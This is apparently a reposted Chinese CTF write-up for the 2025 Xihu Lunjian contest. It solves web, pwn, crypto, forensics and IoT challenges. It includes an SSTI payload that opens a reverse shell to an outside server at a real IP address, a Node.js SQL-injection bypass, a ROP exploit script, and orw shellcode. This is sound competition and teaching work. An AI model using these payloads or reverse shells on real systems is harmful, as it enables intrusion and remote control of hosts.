2025 西湖论剑 Writeup

admin 2025年1月20日08:43:55评论92 views字数 13522阅读45分4秒阅读模式

Web

Rank-l

ssti模板注入

题目访问后,用户输入处执行ssti,密码处解析执行。

首先梭哈读文件的exp 发现/flag读不了 那就尝试读一下app.py 通过报错确定文件名,然后读源代码

通过源代码确定本题的黑名单

['eval''exec''os''system''import''__import__','flag''?''*''-''less''nl''tac''more''tail''od''grep''awd''sed''64''/''%2f''%2F']

直接fenjing嗦就行

from fenjing import exec_cmd_payloadimport functoolsimport timeimport logginglogging.basicConfig(level = logging.WARNING)def waf(s: str):    blacklist = ['eval''exec''os''system''import''__import__','flag''?''*''-''less''nl''tac''more''tail''od''grep''awd''sed''64''/''%2f''%2F']for word in blacklist:if word in s:return Falsereturn Truepayload, _ = exec_cmd_payload(waf, "curl vps:3333")payload, _ = exec_cmd_payload(waf, "bash -c 'bash -i >& /dev/tcp/vps/3333 0>&1'")print(payload)

构造payload如下

{{((g.pop.__globals__.__builtins__['__i''mport__']("x6fx73").popen((('%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c')%(98,97,115,104,32,45,99,32,39,98,97,115,104,32,45,105,32,62,38,32,47,100,101,118,47,116,99,112,47,49,50,49,46,51,55,46,49,53,50,46,49,48,56,47,51,51,51,51,32,48,62,38,49,39)))).read())}}

vps监听回弹,获取flag

2025 西湖论剑 Writeup

sqli or not

考点 nodejs特性

var express = require('express');var router = express.Router();module.exports = router;router.get('/',(req,res,next)=>{if(req.query.info){if(req.url.match(/,/ig)){            res.end('hacker1!');//第一层需要绕过逗号,这里采取变量拼接绕过即可        } var info = JSON.parse(req.query.info);if(info.username&&info.password){var username = info.username;var password = info.password;if(info.username.match(/'|"|\/) || info.password.match(/'|"|\/)){                res.end('hacker2!');            }//第二层,替代进行万能密码注入var sql = "select * from userinfo where username = '{username}' and password = '{password}'";            sql = sql.replace("{username}",username);            sql = sql.replace("{password}",password);            connection.query(sql,function (err,rs{if (err) {                res.end('error1');            }else {if(rs.length>0){                res.sendFile('/flag');                }else {                res.end('username or password error');                }            }            })        }else{            res.end("please input the data");        }}else{        res.end("please input the data");    }})

构造payload如下

?info={"username":"11111"&info="password":"123"}
2025 西湖论剑 Writeup

参考:https://sakurahack-y.github.io/2022/11/20/NodeJs%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/

下面进行闭合sql,绕过第二层限制,构造$``符号替代单引号,满足select查询条件,触发res.sendFile('/flag')`读取flag

原理参考:

https://www.w3school.com.cn/jsref/jsref_replace.asp

2025 西湖论剑 Writeup

构造万能密码如下

//传参: a%20$`||2--+  $`||2--+select * from userinfo where username = '$`||2--+// ' and password = '{password}'
/?info={"username":"$`||2--+"&info="password":"123"/?info={"username":"$`||2--+"&info="password":"$`+or+1%3d1%20"}

2025 西湖论剑 Writeup

Pwn

VPWN

漏洞点:

2025 西湖论剑 Writeup

在创建element中会把当前element的数据保存在栈中,但是位置在element下面

2025 西湖论剑 Writeup所以只需要创建7个即可覆盖到count,将count覆盖成一个很大的数就可以通过edit函数的覆盖到ret返回地址
2025 西湖论剑 Writeup

用show函数泄露出libc即可构造ROP

exp:

from pwn import *import structcontext.log_level = "debug"context.terminal = ["wt.exe","wsl"]defget_p(file):    elf = ELF(file)# p = elf.process()    p = remote("139.155.126.78",30798)return p,elfdefdebug():    pause()    gdb.attach(p)    sleep(2)p,elf = get_p("./pwn")libc = ELF("/home/kamome/tools/glibc-all-in-one/libs/2.35-0ubuntu3.8_amd64/libc.so.6")'''def xxx():    p.sendlineafter()    p.sendlineafter()    p.sendlineafter()'''defedit(idx,content):    p.sendlineafter(b"Enter your choice: ",b"1")    p.sendlineafter(b"Enter the index to edit (0-based): ",str(idx))    p.sendlineafter(b"Enter the new value: ",str(content))defadd(content):    p.sendlineafter(b"Enter your choice: ",b"2")    p.sendlineafter(b"Enter the value to push: ",content)deffree(idx):    p.sendlineafter(b"Enter your choice: ",b"3")defshow():    p.sendlineafter(b"Enter your choice: ",b"4")add(b"123")add(b"123")add(b"123")add(b"123")add(b"123")add(b"123")add(b"123")show()p.recvuntil(b"StackVector contents: ")# sleep(2)address = p.recvuntil(b"n")log.success(b"addr = " + address)address = address.decode()address = address.split(" ")libc_base = int(address[19])libc_part1 = u32(struct.pack("i",int(address[18])))libc.address = ((libc_base << 32) + libc_part1) - 0x29d90log.success("addr = " + hex(libc.address))pop_rdi = libc.address + 0x000000000002a3e5ret = libc.address + 0x0000000000029139system_addr = libc.sym["system"]binsh_addr = next(libc.search(b"/bin/sh"))edit(18,pop_rdi & 0xffffffff)edit(19,pop_rdi >> 32)edit(20,binsh_addr & 0xffffffff)edit(21,binsh_addr >> 32)edit(22,ret & 0xffffffff)edit(23,ret >> 32)edit(24,system_addr & 0xffffffff)edit(25,system_addr >> 32)p.sendlineafter(b"Enter your choice: ",b"5")# debug()p.interactive()

Heaven's door

漏洞点:

2025 西湖论剑 Writeup

可以直接执行输入的shellcode

最多能够支持两次系统调用

2025 西湖论剑 Writeup

开启了沙箱,看样子是白名单,但是没有设置除白名单之外的系统调用号进行限制,所以什么系统调用都能执行,虽然不知道为什么执行完execve("/bin/sh",0,0)后没反应

2025 西湖论剑 Writeup

后面直接在网上找到一篇两次syscall就可以完成orw的shellcode

2025 西湖论剑 Writeup
2025 西湖论剑 Writeup

运行完即可获取flag

exp:

from pwn import *context.arch = "amd64"context.log_level = "debug"context.terminal = ["wt.exe","wsl"]elf = ELF("./pwn")p = elf.process()# p = remote("139.155.126.78",23360)defdebug():    gdb.attach(p)    pause()shellcode = asm("""push 0x67616c66  /* push b'flagx00' */push 2pop raxmov rdi, rspxor esi, esi cdq syscall/* call sendfile(1, 'rax', 0, 0x100) */mov r10d, 0x100mov rsi, raxpush 40 /* sendfile的系统调用号0x28 */pop raxpush 1pop rdicdq syscall""")p.recvuntil(b"n")sleep(0.2)p.send(shellcode)p.interactive()

Cry

matrixRSA

可以看出来是高位攻击,先尝试了boneh Durfee没成功。后续搜索到一篇相关文章https://www.ruanx.net/coppersmith/

看得出来条件比较相似,经过调整获得代码:

from sympy import Integer as SymIntfrom sage.rings.integer import Integer as SageIntfrom sage.rings.finite_rings.integer_mod_ring import Zmodfrom Crypto.Util.number import *ph = int(12305755811288164655681709252717258015229295989302934566212712319314835335461946241491177972870130171728224502716603340551353785064416812665744581355110400)n = 132298777672085547096511087266255066285502135020124093900452138262993155381766816424955849796168059204379325075568094431259877923353664926875986223020472585645919414821322880213299188157427622804140996898685564075484754918339670099806186873974594139182324884620018780943630196754736972805036038798946726414009R.<x> = Zmod(n)[]f=ph+xpl =ZZ(f.small_roots(X=2**100,beta=0.4)[0])p= pl+phq= n//passert p*q==nphi =p*(p-1)*(p+1)*(p**2+p+1)*q*(q-1)*(q+1)*(q**2+9+1)e = 65537d= inverse(e, phi)print(d)''''''n = 132298777672085547096511087266255066285502135020124093900452138262993155381766816424955849796168059204379325075568094431259877923353664926875986223020472585645919414821322880213299188157427622804140996898685564075484754918339670099806186873974594139182324884620018780943630196754736972805036038798946726414009C = [[130700952989014311434434028098810412089294728270156705618326733322297465714495704072159530618655340096705383710304658044991149662060657745933090473082775425812641300964472543605460360640675949447837208449794830578184968528547366608180085787382376536622136035364815331037493098283462540849880674541138443271941,71108771421281691064141020659106224750236412635914570166893031318860027728093402453305986361330527563506168063047627979831630830003190075818824767924892107148560048725155587353683119195901991465464478196049173060097561821877061015587704803006499153902855903286456023726638247758665778434728734461065079337757,67999998657112350704927993584783146575182096185020115836188544590466205688442741039622382576899587857972463337900200038021257164640987281308471100297698062626107380871262596623736773815445544153508352926374272336154553916204320257697068627063236060520725376727528604938949588845448940836430120015498687885615],[ 23893343854815011808020457237095285782125931083991537368666368653089096539223297567339111502968295914745423286070638369517207554770793304994639155083818859208362057394004419565231389473766857235749279110546079776040193183912062870294579472815588333047561915280189529367474392709554971446978468118280633281993,9711323829269829751519177755915164402658693668631868499383945203627197171508441332211907278473276713066275283973856513580205808517918096017699122954464305556795300874005627001464297760413897074044080665941802588680926430030715299713241442313300920463145903399054123967914968894345491958980945927764454159601,44904507975955275578858125671789564568591470104141872573541481508697254621798834910263012676346204850278744732796211742615531019931085695420000582627144871996018850098958417750918177991375489106531511894991744745328626887250694950153424439172667977623425955725695498585224383607063387876414273539268016177401],[ 67805732998935098446255672500407441801838056284635701147853683333480924477835278030145327818330916280792499177503535618310624546400536573924729837478349680007368781306805363621196573313903080315513952415535369016620873765493531188596985587834408434835281527678166509365418905214174034794683785063802543354572,13486048723056269216825615499052563411132892702727634833280269923882908676944418624902325737619945647093190397919828623788245644333036340084254490542292357044974139884304715033710988658109160936809398722070125690919829906642273377982021120160702344103998315875166038849942426382506293976662337161520494820727,95932690738697024519546289135992512776877884741458439242887603021792409575448192508456813215486904392440772808083658410285088451086298418303987628634150431725794904656250453314950126433260613949819432633322599879072805834951478466009343397728711205498602927752917834774516505262381463414617797291857077444676]]d=40230916883870975295417572445649759339852136874541002176973752451527591240861096967430489803821942773799391815661674299963553292463650235263727969014389785777665819655007474882298098229878813311376932399465744538646034939720955659019308738679692623129926990697777836666307149347750450442780453381039250373602002593874209103388231487190907175328166162564877943935162710248286756573517334543023648858684936469981950047976510851487311086482340081683345123544331772948394919719283886206697667295063758577599450894563047427201824896559559485062700718420451540502835234512267558960664547262336244031453163856153728029624773176461848238206859021866605114137013408588494942293135134906092831348276057200186924147295801417144669512448970855617474869961151344573825732071548725870642959331210768078570265383975425236335097212652349996163122356597824509934432776876686173173154415327059863598313156919579830449191858076215165247448201508850279235562403361368606784672551045482343305733351227204416686409931509634146371694652412878430940695410618258129138788972089438119159209182576340508750689247634560875279231143285461186459647253220477687677492972526262668202807605901607404051474350710537111564197493331201627573479606786507013716251563465866742020446763795046530618656040799998883423817653707626400175314432500297435031606092421804621920751473201072723348373087501316847682521422876803695814440009083463512010180408136488438161651707355829976671077902441340621658291647045248288911061239698672287968916239609863189634395069604688328431093595607041C= matrix(Zmod(n),C)M =C^dfor i in M:    for j in i:        print(long_to_bytes(int(j)).decode(),end='')

sagemath的数据结构管理混乱,有些数字得手动填入

DS

easyrawencode

  1. 使用volatility2 对镜像进行取证,filescan扫描发现三个可疑文件
2025 西湖论剑 Writeup

将其导出,结合题目猜测为flag文件,查看hack.py可以发现需要存在系统环境内的hackkey和nonce、tag、enc_aes_key。

2025 西湖论剑 Writeup
2025 西湖论剑 Writeup

使用volaility2 的 envars参数获取hackkey的值

2025 西湖论剑 Writeup
2025 西湖论剑 Writeup

使用volaility2 的 consoles参数获取曾经运行的参数

2025 西湖论剑 Writeup

这样就得到了hackkey、nonce、tag和enc_aes_key,简单拷打一下chat得到一个解密脚本

2025 西湖论剑 Writeup
import hashlibfrom Crypto.Cipher import AES, PKCS1_OAEPfrom Crypto.PublicKey import RSA# 解密 RSA 加密的 AES 密钥with open('private.pem''r'as f:    private_key = RSA.import_key(f.read())# 这里将替代的解密 AES 密钥# 请确保提供以下数据:`enc_aes_key`    - 加密过的 AES 密钥(16进制表现形式转回二进制)`nonce`          - AES 密码块的随机数(16进制表现形式转回二进制)`tag`            - 用于认证 GCM 模式的检查码`encrypted_data` - 加密的内容(从文件 `encrypted_data.bin` 中读取)# 粘贴加密脚本生成的相关数据enc_aes_key = bytes.fromhex("20d96098010eb9b326be6c46e1ce1ca679e29f1d65dec055cf8c46c6436c3356af2dc312b2d35466308b9fff0dd427b44a37e34fca12992e45db2ddd81884bd8eb5bccd3c595e8a9a352bd61322e1d52329d6c8638bbfce65edffbc4d3a5759e88c0f90e31ce518837552a3a09d8e7e3c374f3857bfe501cce2066fb233ff1f5faac18d73c3b665a54e8c55574f16bf4678c5ce835d2a14a65f8c1cec012435a8c06314cbe727a3a9b6060dfd6cdb850073423841178f6f409bb7ce8d4863c6f58855954d34af3d2964c488c9057c8c5072a54e43f1f8039d32409eb1ff3abca41c0b302788c4c56c1a4be4506ff5b8aff0242e21c0ee7ffee2da20ed9434334")nonce = bytes.fromhex("d919c229aab6535efa09a52c589c8f47")tag = bytes.fromhex("5b204675b1b173c32c04b0b8a100ee29")cipher_rsa = PKCS1_OAEP.new(private_key)aes_key = cipher_rsa.decrypt(enc_aes_key)# 解密 AES 加密的数据with open('encrypted_data.bin''rb'as f:    encrypted_data = f.read()# 使用 nonce 和 aes_key 初始化 AES 解密对象cipher_aes = AES.new(aes_key, AES.MODE_EAX, nonce=nonce)# 校验并解密数据try:    decrypted_data = cipher_aes.decrypt_and_verify(encrypted_data, tag)    print("Decryption successful! ��✅")    print(decrypted_data.decode('utf-8'))  # 如果解密的内容是文本except ValueError as e:    print("Decryption failed! ��❌")    print(f"Error: {str(e)}")# 如果需要,将解密后的内容写入文件with open('decrypted_data.csv''wb'as f:    f.write(decrypted_data)
  1. 运行得到解密后的data.csv 文件,看到密码和加密个性签名猜到为某种加密,解密的密钥为密码,经过尝试可以解出为 rc4 加密
2025 西湖论剑 Writeup
2025 西湖论剑 Writeup

写个简单脚本批量解密即可

import csvfrom Crypto.Cipher import ARC4import base64def rc4_decrypt(data, key1):  # 解密data = base64.b64decode(data)key = bytes(key1, encoding='utf-8')enc = ARC4.new(key)res = enc.decrypt(data)res = str(res, 'utf-8')return resif __name__ == "__main__":csv_reader = csv.reader(open("decrypted_data.csv",encoding="utf-8"))for row in csv_reader:try:encrypt_data = row[6]key = row[2]print('解密后:', rc4_decrypt(encrypt_data, key))  # 解密方法except:pass

运行即得到flag

2025 西湖论剑 Writeup

获取flag截图

IOT

blink

2025 西湖论剑 Writeup

使用binwalk提取固件,发现0x3010偏移处有个/dev/uart/0

2025 西湖论剑 Writeup

使用strings大致看一下,发现里面有个rtosandmorseisveryeasyhahhaha字符串

2025 西湖论剑 Writeup

结合题目提示,猜测这是flag,提交后正确

sharkp

2025 西湖论剑 Writeup

下载题目附件,首先先分析一下output2数据包,然后在tcp数据流157处看到了

2025 西湖论剑 Writeup

从这里判断出来他是一个RCE,在tcp流190是可以看到elf文件,进行导出,分析其中的shellcode值

2025 西湖论剑 Writeup

将他导出然后搭建qiling环境进行模拟

搭建参考:https://blog.csdn.net/freeking101/article/details/128522901

如果使用了pip进行安装,还需要去下载rootfs,然后自己解压,在模拟的时候将路径指定到解压的路径。安装后进行模拟即可

2025 西湖论剑 Writeup
2025 西湖论剑 Writeup

setSystemAdmin_115.195.88.161

ssetSystemAdmin_ 115.195.88.161

ha

最终得到flag

原文始发于微信公众号(ACT Team):2025 西湖论剑 Writeup

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月20日08:43:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2025 西湖论剑 Writeuphttps://cn-sec.com/archives/3648102.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息